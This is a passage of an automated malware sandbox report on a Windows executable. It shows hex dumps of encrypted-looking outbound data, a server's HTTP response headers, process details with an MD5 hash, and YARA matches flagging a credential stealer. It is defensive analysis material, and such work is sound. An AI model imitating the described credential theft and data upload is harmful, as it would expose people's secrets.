                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: 5f 79 fb cd 11 66 66 af 41 97 11 78 67 6d ed 0d 0e ae df d5 f7 d0 47 20 81 7d 63 c7 69 a6 22 4d 41 b5 de 8f f5 ed 22 a1 c1 cc 7f f3 5b 74 f9 e7 9e 27 79 0a f0 66 df ab 55 21 86 fd 17 59 78 64 e3 a1 36 62 a9 b2 b3 6b cd d0 41 a2 25 80 ab d3 51 fb 4f fe b9 4d 8b c5 96 1a 48 62 53 c0 bd 62 25 bf 73 ea f5 5c ed 1f 7d 91 08 31 97 f5 d1 9a c9 11 d3 3d 40 47 b0 4b 63 3e 00 4f a6 3c 53 8c 52 2e ef a5 6c 3d 9a bf 54 ef f6 6d d3 1a c9 b0 27 97 0c bc f3 97 05 67 ca 11 48 4a 8a 98 8c c2 bb 66 31 b0 8e e0 55 7e 6b b2 b9 f5 1a 1a b3 fd cf ba b0 ff 63 fc 00 c4 20 d9 95 58 e6 42 b4 0b f8 c5 34 22 05 1a 82 e5 f1 4f c9 a8 eb 75 39 9b 92 8f 15 25 50 84 a8 1e a8 9e b5 ac 6e 87 3f cb ec bc bf 10 a1 b2 3f d9 f2 5e fd 61 f9 bb 7d 34 cd 1d 0f 7f 92 87 da 0c f8 7f 0a be 20 2a 8f
                                                                                                                Data Ascii: _yffAxgmG }ci"MA"[t'yfU!Yxd6bkA%QOMHbSb%s\}1=@GKc>O<SR.l=Tm'gHJf1U~kc XB4"Ou9%Pn??^a}4 *
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: e2 09 01 dc f6 1d 24 3c d8 a4 be dd ac 4f df 5b 31 03 18 37 20 90 f2 17 30 7c 79 c1 fa f4 9a 2c 60 d2 90 f0 f8 18 4e 87 ca 7a ed b9 fd c0 32 6a bb 82 cd 42 df 82 18 cf e4 00 43 7b ae ec 71 e5 4a e7 e5 8d f3 e6 ba 4f 5b ca ae da 58 61 29 ae 2d d8 2c 04 bc 03 62 ef 41 20 44 c0 db 7f e7 0a 9b c5 dc 61 e8 01 19 6d d0 2d c8 f2 46 84 3d de 09 62 78 9b ce 88 00 eb 7e b9 b2 b6 fb f8 dc 53 7d 19 81 ba a8 a4 2b a2 77 6b af 3e 2c 8e 42 69 cf fb 1a a7 08 29 1d 38 3a 0d e3 d3 f0 30 9e 8c a7 bf 64 df 14 8d b7 1d 86 19 5f 33 f9 e6 7d e5 a5 c2 ac c6 57 4c 3b 47 57 ee 57 f7 fa e7 fc e9 29 ce f9 52 b4 02 b6 31 5c 68 59 7c 34 a7 55 6e 19 15 2c 0d 46 b7 2a cb 29 82 69 b3 95 5a 0f 57 24 dd 67 de fd 28 c8 35 be 2c 09 7c 5e 40 45 05 80 bc 73 c2 15 0d 78 b6 fe 5d 40 5c ab c2 b5
                                                                                                                Data Ascii: $<O[17 0|y,`Nz2jBC{qJO[Xa)-,bA Dam-F=bx~S}+wk>,Bi)8:0d_3}WL;GWW)R1\hY|4Un,F*)iZW$g(5,|^@Esx]@\
2024-12-27 07:46:46 UTC | 1129 bytes | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:46:46 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=4jo13p8n57siolv607k0a8tk34; expires=Tue, 22 Apr 2025 01:33:24 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBFcxdXKkMzruLkk2oR1EzO8merbb7VB6tvI838B563oEG%2FB42htxF3p4lPGEQ8Ts4xZiZrwiKnPwHv3EsKYd2L1SQn3hP9Yi7WZy2rO1XTEA7WCtV3S%2BwNp7AHQY7ILUFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87b2d11eccc328-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1495&rtt_var=572&sent=338&recv=608&lost=0&retrans=0&sent_bytes=2838&recv_bytes=586307&delivery_rate=1893644&cwnd=177&unsent_bytes=0&cid=05905b676912fd6f&ts=2494&x=0"


Target ID: 0
Start time: 02:46:24
Start date: 27/12/2024
Path: C:\Users\user\Desktop\IERiUft8Wi.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\IERiUft8Wi.exe"
Imagebase: 0x830000
File size: 1'884'672 bytes
MD5 hash: C317F66C3BB595D92533E3D0FE227366
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

No disassembly